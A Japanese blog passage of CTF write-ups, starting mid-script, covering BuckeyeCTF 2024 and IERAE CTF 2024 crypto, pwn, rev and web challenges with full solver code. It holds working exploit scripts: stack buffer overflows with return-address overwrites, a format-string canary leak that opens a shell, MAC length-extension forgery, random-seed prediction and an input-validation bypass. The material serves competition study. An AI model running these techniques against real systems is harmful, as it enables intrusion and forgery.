    io.recvuntil(b'option> ')
    io.sendline(b'1')
    io.recvuntil(b'message(in hex)> ')
    io.sendline(msg.hex().encode())
    io.recvuntil(b'e=')
    e = int(io.recvline().strip().decode())
    io.recvuntil(b's=')
    s = int(io.recvline().strip().decode())
    return e, s


def find_x(es: list[tuple[int, int]], q: int) -> int:
    count = len(es)
    big = 2 ** 1024
    M = Matrix(ZZ, count + 5, count + 5)
    for i in range(count - 1):
        (e, s) = es[i]
        (en, sn) = es[i + 1]
        M[count, i] = -sn * big
        M[count + 1, i] = s * big
        M[count + 2, i] = big
        M[count + 3, i] = en * big
        M[count + 4, i] = -e * big
    M[count, count] = big
    M[count + 1, count + 1] = big // (2 ** 384)
    M[count + 2, count + 2] = big // (2 ** 384)
    M[count + 3, count + 3] = big // (2 ** 384)
    M[count + 4, count + 4] = big // (2 ** 768)
    for i in range(count):
        M[i, i] = q * big
    L = M.LLL()
    for row in L:
        if abs(row[count]) != big:
            continue
        coef = row[count] // big
        x = row[count + 3] // M[count + 3, count + 3] // coef
        print(f'# {x = }')
        print(f'# {x.bit_length() = }')
        break
    else:
        raise ValueError('x not found')
    return x


def _hash(message: bytes, r: int, q: int):
    hash_res = SHA256.new(message + long_to_bytes(r))
    return int(hash_res.hexdigest(), 16) % q


def forge_sign(message: bytes, x: int, g: int, p: int) -> tuple[int, int]:
    k = 1
    q = (p - 1) // 2
    r = pow(g, k, p)  # r = g^k mod p
    e = _hash(message, r, q)  # e = H(m || r)
    s = (k + x * e) % q  # s = (k + x * e) mod q
    return (e, s)


def main() -> None:
    start = time.time()
    io.recvuntil(b'running the following command:')
    io.recvline()
    cmd = io.recvline().strip().decode()
    io.recvuntil(b'hashcash token: ')
    io.sendline(get_hashcash(cmd).encode())
    print(f'# ({time.time() - start:.2f}s) hashcash token sent')

    io.recvuntil(b'p=')
    p = int(io.recvline().strip().decode())
    io.recvuntil(b'g=')
    g = int(io.recvline().strip().decode())
    io.recvuntil(b'pub_key=')
    pub_key = int(io.recvline().strip().decode())
    q = (p - 1) // 2

    count = 5

    # collect
    es = []
    for _ in range(count):
        (e, s) = fetch_sign(b'koba')
        es.append((e, s))
    print(f'# ({time.time() - start:.2f}s) signatures collected')

    # solve
    x = find_x(es, q)
    print(f'# ({time.time() - start:.2f}s) x found')
    assert pow(g, x, p) == pub_key

    # forge + submit
    target_msg = b'give me flag'
    (e, s) = forge_sign(target_msg, x, g, p)
    io.recvuntil(b'option> ')
    io.sendline(b'2')
    io.recvuntil(b'message(in hex)> ')
    io.sendline(target_msg.hex().encode())
    io.recvuntil(b'e> ')
    io.sendline(str(e).encode())
    io.recvuntil(b's> ')
    io.sendline(str(s).encode())
    io.recvline()
    io.recvuntil(b'Here is your flag: ')
    print(io.recvline().decode().strip())


if __name__ == "__main__":
    main()

まとめ

反省点は
(i) 基本的な道具 (線型代数、Approximate GCD) に対する理解不十分
(ii) NTRU に対するリサーチ不足
(iii) 実装力の衰え
あたりだと思われる。

単純に典型知識を適用するだけでは解けず、中身の理解を要求するという点で、問題の質はかなり良かったと思われる。まさに実装力不足で全完できなかったのが悔やまれる。

あと Sage 祭り、LLL 祭りだった気がする

BuckeyeCTF 2024 writeup

BuckeyeCTF 2024 にチーム poteti fan club で参加した。日本時間で 2024-09-28 09:00 から 2024-09-30 09:00 まで。

結果は 11/648 位。
crypto 問題を一人で独占してしまって申し訳ない気持ちになった。

解法集

crypto

crypto/rsa

普通の RSA 暗号の鍵 (n, e) と暗号文 c が与えられるので、平文を復元せよという問題。
n が 128 ビットの素数 2 個の積であり短すぎるので、普通に素因数分解できる。

e = 65537
n = 66082519841206442253261420880518905643648844231755824847819839195516869801231
c = 19146395818313260878394498164948015155839880044374872805448779372117637653026

# Found by https://www.alpertron.com.ar/ECM.HTM
phi = 66082519841206442253261420880518905643125623107528489101140402490481535313232


def main() -> None:
    d = pow(e, -1, phi)
    m = pow(c, d, n)
    print(m.to_bytes((m.bit_length() + 7) // 8, "big").decode())


if __name__ == "__main__":
    main()
crypto/hashbrown

HMAC みたいな認証タグをつける装置が与えられるので、"french fry" を含む妥当なデータを作れという問題。
認証タグが hash(secret + message) なので、length extension attack ができる。今回は 16 バイトごとに区切る形式のハッシュ関数なので、pad(元の文章) + "french fry" であればハッシュ値が計算できる。

from pwn import *
import hashbrown
import sys

local = len(sys.argv) == 1
io = process(["python3", "hashbrown.py"]) if local else remote(sys.argv[1], int(sys.argv[2]))


def main() -> None:
    io.recvuntil(b"Hashbrowns recipe as hex:")
    io.recvline()
    msg = bytes.fromhex(io.recvline().strip().decode())
    io.recvuntil(b"Signature:")
    io.recvline()
    sig = bytes.fromhex(io.recvline().strip().decode())

    # Forge MAC
    added_msg = b"french fry"
    added_block = b"french fry" + b"_" * 6
    new_sig = hashbrown.aes(added_block, sig)

    io.recvuntil(b"Give me recipe for french fry? (as hex)")
    io.recvline()
    io.sendline((hashbrown.pad(msg) + added_msg).hex())
    io.recvuntil(b"Give me your signiature?")
    io.recvline()
    io.sendline(new_sig.hex())
    io.recvuntil(b'Your signiature:')
    io.recvline()
    io.recvline()
    print(io.recvall().decode())


if __name__ == "__main__":
    main()
crypto/zkwarmup

mod 合成数平方根を知っているかどうかのゼロ知識証明。
実装をよく見ると Python 標準ライブラリーの random を使っていて、しかも現在時刻 (の秒未満を切り捨てたもの) で初期化している。
こうすると乱数が予測可能になるので平方根も予測できる。

"""
乱数が完全に予測可能
"""
import sys
import random
import time
from pwn import process, remote


local = len(sys.argv) == 1
io = process(["python3", "zkwarmup.py"]) if local else remote(sys.argv[1], int(sys.argv[2]))


def main() -> None:
    """
    main
    """
    start = time.time()
    io.recvuntil(b"n = ")
    n = int(io.recvline().strip().decode())
    random.seed(int(time.time()))
    predicted_x = random.randrange(1, n)
    io.recvuntil(b"y = ")
    y = int(io.recvline().strip().decode())
    if pow(predicted_x, 2, n) != y:
        print('Failed to predict x')
        io.close()
        return
    for iter_count in range(128):
        if iter_count % 20 == 0:
            print(f"# ({time.time()-start:.2f}s) Round {iter_count}")
        r = random.randrange(1, n)
        s = pow(r, 2, n)
        io.recvuntil(b"Provide s: ")
        io.sendline(str(s).encode())
        io.recvuntil(b"b = ")
        b = int(io.recvline().strip().decode())
        z = pow(r * pow(predicted_x, 1 - b, n), 1, n)
        io.recvuntil(b"Provide z: ")
        io.sendline(str(z).encode())
    print(io.recvall().decode())


if __name__ == "__main__":
    main()
crypto/treestore

「オブジェクトを格納する時以下のような挙動をするオブジェクトストレージがある。

  • データを 16 バイトのチャンクに分割する。
  • それらを 2 分木にして、マークル木として各ノードを {sha256 => value} の形で格納する。
  • 新しく追加された (もともと無かった) ノードの個数を返す。

最初にフラグの値が白黒で描画された flag.bmp が格納される。フラグを特定せよ。」という問題である。

bmp ファイルのフォーマットは、(ヘッダー 54 バイト) + (ピクセルの情報 4 バイト) * (ピクセル数) である。(参考: https://www.setsuki.com/hsp/ext/bmp.htm)
特に 16 バイト区切りに分けた場合最後のチャンクは 6 バイトになるので、6 バイトのチャンクの中身が特定できればそれが最後のチャンクだとわかる。
該当の bmp ファイルのピクセル部分は 00000000 か ffffffff のどちらかなので、最後のチャンクは 4 通りしかないし途中の 16 バイトのチャンクも 32 通りしかない。
マークル木の右側から辿り、なおかつ中間ノードとしてあり得るものの組み合わせを (それより下のノードの組み合わせを調べて) 列挙することで、この問題を解くことができる。

まずは以下のスクリプトを実行した。(競技サーバーに近い方がいいので、オハイオ州の近くで実行できる人に実行してもらった。)

"""
merkle tree の右端から辿っていきたい
"""
import sys
import time
from base64 import b64encode
from pwn import process, remote


local = len(sys.argv) == 1


def create_io():
    return process(["nc", "localhost", "1024"]) if local else remote(sys.argv[1], int(sys.argv[2]))


io = create_io()

def check_node_existence(data: bytes) -> bool:
    global io
    try:
        io.recvuntil(b"[*] To add a file to the treestore, enter bytes base64 encoded")
        io.recvline()
        io.recvuntil(b">>> ")
        io.sendline(b64encode(data))
        line = io.recvline().strip().decode()
        if line == "[-] Max storage exceeded!":
            print('# Max storage exceeded!')
            io.close()
            io = create_io()
            return check_node_existence(data)
        if line != "0 chunks were added" and line != "1 chunks were added":
            print(f'# Error: {line}')
            sys.exit(1)
        return line == "0 chunks were added"
    except EOFError:
        print('# EOFError, reconnecting...')
        io.close()
        io = create_io()
        return check_node_existence(data)

def main() -> None:
    """
    main
    """
    start = time.time()
    anchor = b'\0' * 6
    data = []
    for bits in range(32):
        tmp = b''
        for i in range(5):
            if (bits >> i) & 1:
                tmp += b'\0' * 4
            else:
                tmp += b'\xff' * 4
        data.append(tmp[2:18])
    gen1 = []
    for c in data:
        exists = check_node_existence(c)
        if exists:
            gen1.append(c)
    cur_len = 16
    rest_cand = None
    while True:
        paired = None
        for c in gen1:
            if c[-2:] != anchor[:2]:
                continue
            exists = check_node_existence(c + anchor)
            if exists:
                paired = c
                break
        if paired is None:
            pass
        else:
            anchor = paired + anchor
        nextgen = []
        for c0 in gen1:
            for c1 in gen1:
                if c0[-2:] != c1[:2]:
                    continue
                exists = check_node_existence(c0 + c1)
                if exists:
                    nextgen.append(c0 + c1)
        if len(nextgen) == 0:
            for c in gen1:
                if c not in anchor:
                    rest_cand = c
                    break
        gen1 = nextgen
        cur_len *= 2

        print(f'# time: {time.time() - start:.2f}s')
        print(f'# anchor: {len(anchor)}')
        print(f'# cur_len: {cur_len}')
        print(f'# gen1: {len(gen1)}')
        with open('log.txt', 'a') as f:
            f.write(f'anchor = {anchor}\n')
            f.write(f'cur_len = {cur_len}\n')
            f.write(f'gen1 = {gen1}\n')
        if len(gen1) == 0:
            break
    image_len = cur_len + len(anchor) - 54
    width = image_len // 32 // 4
    print(f'# image_len: {image_len}, width: {width}')
    with open('flag.bmp', 'rb') as f:
        data = f.read()
    forged = data[:0x12] + width.to_bytes(4, 'little') + data[0x16:54] + b'\0' * (cur_len - 54) + anchor
    if rest_cand is not None:
        assert len(rest_cand) == cur_len // 2
        forged = forged[:cur_len // 2] + rest_cand + forged[cur_len:]
    with open('forged.bmp', 'wb') as f:
        f.write(forged)


if __name__ == "__main__":
    main()

その後、ログから以下のようなスクリプトで復元した。

import ast

def main():
    pre_cand = None
    pre_cand2 = None
    rest_cand = None
    for line in open('log-yosupo.txt').readlines():
        exec(line, globals())
        if line.startswith('gen1 = '):
            rest = line.removeprefix('gen1 = ')
            rest = ast.literal_eval(rest)
            print(f'# len(rest): {len(rest)}')
            if len(rest) == 2:
                pre_cand = rest
            if len(rest) == 6:
                pre_cand2 = rest

    for r in pre_cand:
        if r not in anchor:
            rest_cand = r
            break
    for r in pre_cand2:
        if r not in rest_cand + anchor:
            rest_cand2 = r
            break
    print(f'# anchor: {len(anchor)}')
    image_len = cur_len + len(anchor) - 54
    width = image_len // 32 // 4
    print(f'# image_len: {image_len}, width: {width}')
    with open('flag.bmp', 'rb') as f:
        data = f.read()
    forged = data[:0x12] + width.to_bytes(4, 'little') + data[0x16:54] + b'\0' * (cur_len - 54) + anchor
    if rest_cand is not None:
        assert len(rest_cand) == cur_len // 2
        forged = forged[:cur_len // 4] + rest_cand2 + rest_cand + forged[cur_len:]
    with open('forged.bmp', 'wb') as f:
        f.write(forged)


if __name__ == "__main__":
    main()

beginner-pwn

beginner-pwn/runway1

https://dogbolt.org/?id=123722f7-fbf8-4f9d-ae33-17a6d9b3c077
get_favorite_food() の実行時、スタックは |変数など (72 バイト)| caller's rbp (4 バイト)| return address (4 バイト)| となっているので、return address を書き換えると ok。
PIE などではないので win() のアドレスは簡単にわかる。

import sys
from pwn import process, remote


local = len(sys.argv) == 1
io = process(['./runway1']) if local else remote(sys.argv[1], int(sys.argv[2]))


def main() -> None:
    io.recvuntil(b'What is your favorite food?')
    io.recvline()
    payload = b'A' * 76 + 0x080491e6.to_bytes(4, 'little')
    io.sendline(payload)
    io.interactive()


if __name__ == '__main__':
    main()
beginner-pwn/runway3

https://dogbolt.org/?id=dbc47717-942e-4bfe-b43d-f19a61221f9c
canary で保護されているので、その値を特定して傷つけないようにバッファーオーバーフローを起こす。

import sys
from pwn import process, remote


local = len(sys.argv) == 1
io = process('docker run -i --workdir /srv/app --rm --platform=linux/amd64 runway3 /srv/app/run'.split(' ')) if local \
    else remote(sys.argv[1], int(sys.argv[2]))


def main() -> None:
    io.recvuntil(b'Is it just me, or is there an echo in here?')
    io.recvline()
    payload = b'%13$p %14$p %15$p'
    io.sendline(payload)
    canary_str, rbp_value_str, retaddr_str = io.recvline().strip().split()
    assert canary_str.startswith(b'0x')
    assert rbp_value_str.startswith(b'0x')
    assert retaddr_str.startswith(b'0x')
    canary = int(canary_str, 16)
    rbp_value = int(rbp_value_str, 16)
    retaddr = int(retaddr_str, 16)
    print(f'# canary: {canary:#x}, rbp_value: {rbp_value:#x}, retaddr: {retaddr:#x}')

    # ローカルではなくリモートだと以下の問題に引っ掛かる。stack pointer を 16 の倍数にするために push 命令を 1 つ飛ばす必要がある。
    # https://www.reddit.com/r/ExploitDev/comments/i5beqt/error_got_eof_while_reading_in_interactive_in/
    desired_retaddr = 0x4011db
    print(f'# overwriting retaddr: {retaddr:#x} => {desired_retaddr:#x}')

    payload = b'A' * 40 \
        + canary.to_bytes(8, 'little') \
        + rbp_value.to_bytes(8, 'little') \
        + desired_retaddr.to_bytes(8, 'little')
    io.sendline(payload)
    io.recvuntil(b'You win! Here is your shell:')
    io.recvline()
    io.sendline(b'cat flag.txt')
    print(io.recvuntil(b'}').decode())


if __name__ == '__main__':
    main()

rev

rev/flagwatch

AutoHotkey スクリプトコンパイルしたものが与えられる。

https://github.com/A-gent/AutoHotkey-Decompiler で decompile すると RCData 以下にスクリプトっぽいものが出る。

wine decompiler/ResourceHacker.exe flagwatch.exe

これの RCData → 1 : 1033 を開くとコードが出てくるので、そこで指定されている encrypted_flag をコピーすれば良い。

encrypted_flag = [62,63,40,58,39,40,111,63,52,50,53,63,104,48,48,37,3,61,3,55,57,37,48,108,59,59,111,46,33]


def main() -> None:
    flag = ""
    for b in encrypted_flag:
        flag += chr(b ^ 92)
    print(flag)


if __name__ == "__main__":
    main()
rev/thank
import sys
from pwn import process, remote

local = len(sys.argv) == 1
io = process(['./thank']) if local else remote(sys.argv[1], int(sys.argv[2]))


def main() -> None:
    content = open('thank.so', 'rb').read()
    io.recvuntil(b'What is the size of your file (in bytes)? ')
    io.sendline(str(len(content)).encode())
    io.recvuntil(b'Send your file!')
    io.recvline()
    io.sendline(content)
    print(io.recvall().decode())


if __name__ == '__main__':
    main()

web

web/quote

入力されたクエリーパラメーターに応じて名言を返す Web サービスがある。ただしアクセスが許可されているのは 0 番から 4 番までの 5 個のみ。

まず const i = Number(id); して i に対して検証してから parseInt(i) して添字を計算しているので、例えば i = 7e-20 であれば検証は通った上で parseInt(i) == 7 が成立する。
つまり、(サービス内の https://quotes.challs.pwnoh.io/register などにアクセスして JWT を手に入れた上で) https://quotes.challs.pwnoh.io/quote?id=7e-20 とかにアクセスすればチェックをバイパスできる。

まとめ

crypto が全体的に考察要素薄めで、パソコン要素多めだった。

IERAE CTF 2024 writeup

IERAE CTF 2024 にチーム poteti fan club で参加した。日本時間で 2024-09-21 15:00 から 2024-09-22 15:00 まで。

結果は 5/224 位。
私は 1 問しか解けなかった上にそれも共同作業だったが、せっかくなので残しておく。

解法集

Heady Heights

  • 88 ビットのランダムな素数 p
  • 88 ビットのランダムな整数 a, b
  • 0 以上 p^7 未満の整数 secret
  • フラグを表す整数 m

が裏で決まっている。EllipticCurve(Zmod(p^8), [a, b]) 上で以下のようにとった 3 点が与えられるので、m を求めよ。

  • P: x 座標が 1337 である点
  • Q: secret * P に等しい
  • R: x 座標が secret * m % (p^8) である点

まずは p, a, b を求める必要がある。3 点与えられているので連立方程式を立てれば p^8 のある倍数が得られるが、それの因数分解は普通にやると難しい。Coppersmith の定理を使って p が計算できるらしいが未確認。(その部分はチームメイトにやってもらった。)

(2024-09-24 12:30 追記) Coppersmith ではうまくいかなかったので ECM (楕円曲線を用いた素因数分解法) を使った。

import time
import ast


with open('transcript.txt', 'r') as f:
    lines = f.readlines()
    x1, x2, x3 = ast.literal_eval(lines[0])
    y1, y2, y3 = ast.literal_eval(lines[1])


def find_nab() -> tuple[int, int, int]:
    """
    (a multiple of p^8, = a mod p^8, = b mod p^8)
    """
    # c[i] = y[i]^2 - x[i]^3 = a * x[i] + b (mod p^8)
    c1 = y1^2 - x1^3
    c2 = y2^2 - x2^3
    c3 = y3^2 - x3^3

    # d[i] = (c[i] - c[1]) * (x[5-i] - x[1]) = a * (x[2] - x[1]) * (x[3] - x[1]) (mod p^8)
    d2 = (c2 - c1) * (x3 - x1)
    d3 = (c3 - c1) * (x2 - x1)

    n = abs(d2 - d3)
    a = (c2 - c1) * pow(x2 - x1, -1, n)
    b = (c1 - a * x1) % n
    return (n, a, b)


def find_p(n: int) -> int:
    start = time.time()
    f = ECM()
    while True:
        found, rest = f.find_factor(n, factor_digits=27)
        (x, y) = found.perfect_power()
        print(f'# ({time.time() - start:.2f}s) Found factor: {found} = {x}^{y}')
        if n % (x^8) == 0:
            return x
        n = rest


def main() -> None:
    (n, a, b) = find_nab()
    p = find_p(n)
    print(f'p = {p}')
    print(f'a = {a % p^8}')
    print(f'b = {b % p^8}')


if __name__ == '__main__':
    main()

結果は以下のようになり、p, a, b が求められた。

$ sage solve0.sage
# (0.02s) Found factor: 2 = 2^1
# (0.03s) Found factor: 2 = 2^1
# (0.06s) Found factor: 2 = 2^1
# (0.07s) Found factor: 2 = 2^1
# (4.93s) Found factor: 35764881942880514781 = 35764881942880514781^1
# (220.32s) Found factor: 6223974622975369169562567725786857145362115460942923157165606761078369051592612183748734385724872112349709798180553302509115878018664263543083742427898087620984517306384044470054975520797172723893645179096435041 = 223490196137382483691737269^8
p = 223490196137382483691737269
a = 296018244906604047474066870
b = 229833986083217530673727493

p, a, b がわかったら SSSA Attack を行う。
E を mod p での (つまり  \mathbb{F}_p 上の) 楕円曲線、E' を mod p^8 での (つまり  \mathbb{Z}/p^8\mathbb{Z} 上の) 楕円曲線とする。このとき、 E' \simeq E \times \mathbb{Z}/p^7\mathbb{Z} が成立する (特に、位数は |E'| = |E| * p^7 である)。
(以下 SSSA attack の軽い説明) 楕円曲線の座標系を変換し (z, w) = (-x/y, -1/y) として z, w を使うことにすると、楕円曲線単位元は (z, w) = (0, 0) となり扱いやすくなる。
ここで P や Q の位数 order を P や Q に掛けたものを oP, oQ と置くと、それを E 上で行った場合は E の単位元 ( (0, 0) ) になるが E' 上で行った場合は (p の倍数, p の倍数) になるのがポイント。

  • zw-座標で表された、z 座標が p の倍数である 2 点 (z1, w1), (z2, w2) を足すと、z = z1 + z2 + (p^2 の倍数) となるので、p^2 の倍数の差を無視すれば k * (z1, w1) = (k * z1, ...) である。これを利用して oP, oQ から secret % p が求められる。
  • secret % p^2 を求めるには、oQ の代わりに oQ - secret * oP に対して同じようなことをやれば良い。secret % p^3, ... も同様。
from Crypto.Util.number import long_to_bytes
import math
from Crypto.Util import number
import ast


with open('transcript.txt', 'r') as f:
    lines = f.readlines()
    x1, x2, x3 = ast.literal_eval(lines[0])
    y1, y2, y3 = ast.literal_eval(lines[1])

K = 8
p = 223490196137382483691737269
a = 296018244906604047474066870
b = 229833986083217530673727493
mod = p**K


def xy_to_zw(mo: int, point: tuple[int, int]) -> tuple[int, int]:
    (x, y) = point
    w = number.inverse(-y, mo)
    z = x * w % mo
    return (z, w)

class ECZW:
    def __init__(self, mo: int, a1: int, a2: int, a3: int, a4: int, a6: int):
        """y^2 + a1 * x * y + a3 * y = x^3 + a2 * x^2 + a4 * x + a6
        w = z^3 + a1 * z * w + a2 * z^2 * w + a3 * w^2 + a4 * z * w^2 + a6 * w^3
        """
        self.mo = mo
        self.a1 = a1
        self.a2 = a2
        self.a3 = a3
        self.a4 = a4
        self.a6 = a6

    @staticmethod
    def simplified(mo: int, a: int, b: int):
        """Simplified form: y^2 = x^3 + a * x + b
        w = z^3 + a * z * w^2 + b * w^3
        """
        return ECZW(mo, 0, 0, 0, a, b)

    def is_on(self, point: tuple[int, int]) -> bool:
        return self.g(point) == 0

    def g(self, point: tuple[int, int]) -> bool:
        mo = self.mo
        a1 = self.a1
        a2 = self.a2
        a3 = self.a3
        a4 = self.a4
        a6 = self.a6
        (z, w) = point
        rhs = z * z * z + a1 * z * w + a2 * z * z * w + a3 * w * w + a4 * z * w * w + a6 * w * w * w
        return (rhs - w) % mo

    def g_z(self, point: tuple[int, int]) -> int:
        """∂g/∂z(point)
        """
        (z, w) = point
        mo = self.mo
        a1 = self.a1
        a2 = self.a2
        a4 = self.a4
        return (3 * z * z + a1 * w + 2 * a2 * z * w + a4 * w * w) % mo

    def g_w(self, point: tuple[int, int]) -> int:
        """∂g/∂w(point)
        """
        (z, w) = point
        mo = self.mo
        a1 = self.a1
        a2 = self.a2
        a3 = self.a3
        a4 = self.a4
        a6 = self.a6
        return (a1 * z + a2 * z * z + 2 * a3 * w + 2 * a4 * z * w + 3 * a6 * w * w - 1) % mo

    def inv(self, p: tuple[int, int]) -> tuple[int, int]:
        """Computes -p
        """
        mo = self.mo
        a1 = self.a1
        a3 = self.a3
        (z, w) = p
        invden = number.inverse(a1 * z + a3 * w - 1, mo)
        return (z * invden % mo, w * invden % mo)

    def add(self, p1: tuple[int, int], p2: tuple[int, int]) -> tuple[int, int]:
        """Computes p1 + p2
        """
        mo = self.mo
        a1 = self.a1
        a2 = self.a2
        a3 = self.a3
        a4 = self.a4
        a6 = self.a6
        (z1, w1) = p1
        (z2, w2) = p2
        lam = None
        invlam = None
        if z1 == z2 and w1 == w2:
            nom = self.g_z(p1)
            den = -self.g_w(p1) % mo
            if math.gcd(den, mo) != 1:
                invlam = den * number.inverse(nom, mo) % mo
            else:
                lam = nom * number.inverse(den, mo) % mo
        elif math.gcd(abs(z2 - z1), mo) != 1:
            invlam = (z2 - z1) * number.inverse(w2 - w1, mo) % mo
        else:
            lam = (w2 - w1) * number.inverse(z2 - z1, mo) % mo
        if lam is not None:
            nu = (w1 - z1 * lam) % mo
            zsum = -(a1 * lam + a2 * nu + a3 * lam * lam + 2 * a4 * lam * nu + 3 * a6 * lam * lam * nu) \
                * number.inverse(1 + lam * (a2 + lam * (a4 + a6 * lam)), mo)
            z3 = -(z1 + z2 - zsum) % mo
            w3 = (lam * z3 + nu) % mo
        elif invlam is not None:
            mu = (z1 - invlam * w1) % mo
            wsum = -number.inverse(a6 + invlam * (a4 + invlam * (a2 + invlam)), mo) \
                * (a3 + mu * (a4 + 2 * a2 * invlam) + a1 * invlam + 3 * invlam * invlam * mu)
            w3 = -(w1 + w2 - wsum)
            w3 %= mo
            z3 = (invlam * w3 + mu) % mo
        else:
            z = z1
            z3 = z
            # TODO: a6 != 0 must hold
            wsum = (a3 + a4 * z) * number.inverse(-a6, mo) % mo
            w3 = (wsum - w1 - w2) % mo
        return self.inv((z3, w3))

    def mul(self, x: int, p: tuple[int, int]) -> tuple[int, int]:
        """Computes x * p
        """
        result = (0, 0)
        cur = p
        while x > 0:
            if x % 2 == 1:
                result = self.add(result, cur)
            cur = self.add(cur, cur)
            x //= 2
        return result

    def lift(self, less_mo: int, p: tuple[int, int]) -> tuple[int, int]:
        """Hensel lifting to mod less_mo^2
        """
        assert less_mo * less_mo == self.mo
        mo = self.mo
        g_z = self.g_z(p)
        g_w = self.g_w(p)
        (z, w) = p
        if g_z % less_mo != 0:
            newz = (z - self.g(p) * number.inverse(g_z, mo)) % mo
            assert self.is_on((newz, w))
            return (newz, w)
        neww = (w - self.g(p) * number.inverse(g_w, mo)) % mo
        assert self.is_on((z, neww))
        return (z, neww)


def main() -> None:
    E = EllipticCurve(Zmod(p^K), [a, b])

    assert E.is_on_curve(x1, y1)
    assert E.is_on_curve(x2, y2)
    assert E.is_on_curve(x3, y3)

    order = 5 * 7 * 13 * 70169606322566202068537
    assert EllipticCurve(Zmod(p), [a, b])(x1, y1) * order == 0
    ec = ECZW.simplified(p^K, a, b) # EC mod p^8
    P1 = xy_to_zw(p^K, (x1, y1))
    P2 = xy_to_zw(p^K, (x2, y2))
    assert ec.is_on(P1)
    assert ec.is_on(P2)
    oP1 = ec.mul(order, P1)
    assert ec.is_on(oP1)
    disclog = 0
    for i in range(K - 1):
        oP2 = ec.mul(order, ec.add(P2, ec.inv(ec.mul(disclog, P1))))
        assert ec.is_on(oP2)
        assert oP1[0] % p == 0
        assert oP2[0] % (p^(i + 1)) == 0
        v1 = oP1[0] // p
        v2 = oP2[0] // (p ^ (i + 1))
        cur = v2 * pow(v1, -1, p) % p
        disclog += cur * (p ^ i)
        print(f'# disclog[{i}] =', disclog)
    print("# disclog =", disclog)
    m = x3 * pow(disclog, -1, p ^ 8) % (p ^ 8)
    print(long_to_bytes(m).decode())

    assert E(x1, y1) * disclog == E(x2, y2)


if __name__ == '__main__':
    main()

公式解法を見たら楕円曲線の自前実装ではなく Qp 上の EllipticCurve を使っており、そちらの方が楽だった。

まとめ

SSSA Attack についての認識が甘く、気づくのに時間がかかった。